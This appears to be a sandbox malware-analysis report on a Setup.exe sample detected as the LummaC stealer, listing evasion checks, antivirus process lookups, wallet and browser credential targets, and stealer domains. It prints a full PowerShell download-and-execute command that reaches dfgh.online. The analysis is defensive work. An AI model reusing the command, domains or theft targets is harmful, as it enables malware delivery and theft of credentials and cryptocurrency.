Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	Binary or memory string: puQEMus
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: #Setup.exe, 00000000.00000003.2306796493.0000000000719000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2287972610.0000000000719000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.0000000000719000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2237363317.000000000070B000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2268384150.0000000000718000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2248737423.0000000000718000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: #Setup.exe, 00000000.00000003.2237363317.000000000070B000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2268384150.0000000000718000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2248737423.0000000000718000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003809000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: powershell.exe, 00000005.00000002.2377053357.0000000006FD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000002.2475472687.000000000127C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\I
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000002.2475472687.000000000127C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\#Setup.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02950417 mov edx, dword ptr fs:[00000030h]	0_2_02950417
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_029509D7 mov eax, dword ptr fs:[00000030h]	0_2_029509D7
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02951027 mov eax, dword ptr fs:[00000030h]	0_2_02951027
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02951026 mov eax, dword ptr fs:[00000030h]	0_2_02951026
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02950D87 mov eax, dword ptr fs:[00000030h]	0_2_02950D87

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe

NtQuerySystemInformation: Direct from: 0x4585B0

LummaC encrypted strings found

Source: #Setup.exe	String found in binary or memory: tirepublicerj.shop
Source: #Setup.exe	String found in binary or memory: noisycuttej.shop
Source: #Setup.exe	String found in binary or memory: wholersorie.shop
Source: #Setup.exe	String found in binary or memory: framekgirus.shop
Source: #Setup.exe	String found in binary or memory: rabidcowse.shop
Source: #Setup.exe	String found in binary or memory: cloudewahsj.shop
Source: #Setup.exe	String found in binary or memory: nearycrepso.shop
Source: #Setup.exe	String found in binary or memory: abruptyopsn.shop
Source: #Setup.exe	String found in binary or memory: locketsashayz.click

Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe "C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\Desktop\#Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
Source: C:\Users\user\Desktop\#Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;			Jump to behavior

Source: BrightLib.exe, 00000026.00000002.2955581758.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000026.00000000.2908320125.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: BrightLib.exe, 00000026.00000002.2955581758.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000026.00000000.2908320125.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s

Source: C:\Users\user\Desktop\#Setup.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5f168990 VolumeInformation

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe

Code function: 38_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

38_2_00491486

Source: C:\Users\user\Desktop\#Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: #Setup.exe, 00000000.00000003.2306796493.0000000000702000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: find.exe, 0000001D.00000002.2862961366.00000232358D0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000001D.00000002.2862875706.00000232356DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgui.exe
Source: #Setup.exe, 00000000.00000003.2306796493.0000000000758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \MsMpeng.exe

Source: C:\Users\user\Desktop\#Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: #Setup.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: #Setup.exe, 00000000.00000003.2288454730.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: electrum
Source: #Setup.exe, 00000000.00000003.2306403270.0000000000789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallet1
Source: #Setup.exe, 00000000.00000003.2288454730.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: #Setup.exe, 00000000.00000003.2306403270.0000000000789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets
Source: #Setup.exe, 00000000.00000003.2306403270.0000000000789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 1520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\level
Source: #Setup.exe, 00000000.00000003.2288454730.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: #Setup.exe, 00000000.00000003.2268384150.000000000072C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinanceFju
Source: #Setup.exe, 00000000.00000003.2288454730.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ethereum
Source: #Setup.exe, 00000000.00000003.2288454730.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: #Setup.exe, 00000000.00000003.2288454730.0000000000760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
